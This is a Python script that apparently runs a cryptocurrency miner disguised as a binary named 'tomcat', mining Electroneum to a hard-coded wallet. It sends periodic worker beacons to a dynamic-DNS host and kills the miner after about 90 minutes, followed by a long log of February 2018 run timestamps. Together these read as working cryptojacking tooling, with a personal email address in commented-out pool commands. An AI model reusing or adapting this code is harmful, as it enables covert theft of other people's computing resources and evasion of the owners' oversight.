import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:41:01.266808
#2018-02-17 16:27:01.292109
#2018-02-17 18:14:06.402565
#2018-02-17 20:02:05.440960
#2018-02-17 21:50:04.794146
#2018-02-17 23:34:06.900562
#2018-02-18 01:23:01.944708
#2018-02-18 03:10:08.983644
#2018-02-18 04:57:07.409100
#2018-02-18 06:48:07.343041
#2018-02-18 08:39:01.470254
#2018-02-18 10:25:07.307849
#2018-02-18 12:11:07.877998
#2018-02-18 13:57:03.472546
#2018-02-18 15:46:07.704614
#2018-02-18 17:36:07.579843
#2018-02-18 19:24:02.053083
#2018-02-18 21:09:07.100554
#2018-02-18 22:56:07.743804
#2018-02-19 00:45:03.951863
#2018-02-19 02:31:07.015349
#2018-02-19 04:17:03.725822
#2018-02-19 06:01:06.590114
#2018-02-19 07:50:08.933627
#2018-02-19 09:41:02.231275
#2018-02-19 11:31:01.264838
#2018-02-19 13:17:07.802956
#2018-02-19 15:04:01.633248
#2018-02-19 16:53:09.420495
#2018-02-19 18:40:02.085134
#2018-02-19 20:26:04.902736
#2018-02-19 22:13:06.407272
#2018-02-19 23:59:06.471766
#2018-02-20 01:46:05.803056
#2018-02-20 03:32:02.079407
#2018-02-20 05:19:01.615642
#2018-02-20 07:02:07.248806
#2018-02-20 08:48:07.067989
#2018-02-20 10:32:01.667265
#2018-02-20 12:17:01.580033
#2018-02-20 14:05:01.892143
#2018-02-20 15:49:06.842227
#2018-02-20 17:36:01.747633
#2018-02-20 19:23:07.701283
#2018-02-20 21:13:08.255536
#2018-02-20 23:52:07.797513
#2018-02-21 01:38:08.092813
#2018-02-21 03:27:07.772945
#2018-02-21 05:14:06.924943
#2018-02-21 07:03:04.790289
#2018-02-21 08:48:01.915873
#2018-02-21 10:34:07.016499
#2018-02-21 12:22:07.549955
#2018-02-21 14:08:02.060492
#2018-02-21 15:53:07.353635
#2018-02-21 17:44:04.886591
#2018-02-21 19:29:05.881626
#2018-02-21 21:16:08.557051
#2018-02-21 23:02:07.280913
#2018-02-22 00:51:06.586441
#2018-02-22 02:40:01.966228
#2018-02-22 04:26:04.355652
#2018-02-22 06:11:04.383882
#2018-02-22 07:55:07.964646
#2018-02-22 09:43:06.753136
#2018-02-22 11:28:01.280071
#2018-02-22 13:14:04.104199
#2018-02-22 15:04:10.167404
#2018-02-22 16:48:12.655244
#2018-02-22 18:34:09.211298
#2018-02-22 20:27:07.272834
#2018-02-22 22:13:08.419076
#2018-02-23 00:02:07.441946
#2018-02-23 02:02:07.537823
#2018-02-23 03:50:06.834204
#2018-02-23 05:40:06.489477
#2018-02-23 07:25:09.673273
#2018-02-23 09:31:01.951105
#2018-02-23 11:38:08.539849
#2018-02-23 13:27:07.122437
#2018-02-23 15:13:07.870197
#2018-02-23 17:01:04.278982
#2018-02-23 18:50:06.478078
#2018-02-23 20:35:07.751310
#2018-02-23 22:21:07.420067
#2018-02-24 00:07:03.608954
#2018-02-24 01:58:05.935112
#2018-02-24 03:51:01.292827
#2018-02-24 05:35:08.789806
#2018-02-24 07:21:07.166235
#2018-02-24 09:10:09.288196
#2018-02-24 11:09:01.612124
#2018-02-24 12:57:05.048934
#2018-02-24 14:46:01.527443
#2018-02-24 16:38:01.838615
#2018-02-24 18:27:01.934107
#2018-02-24 20:13:01.989698
#2018-02-24 22:01:07.273684
#2018-02-25 00:59:07.242391
#2018-02-25 04:44:06.292559
#2018-02-25 08:51:01.615985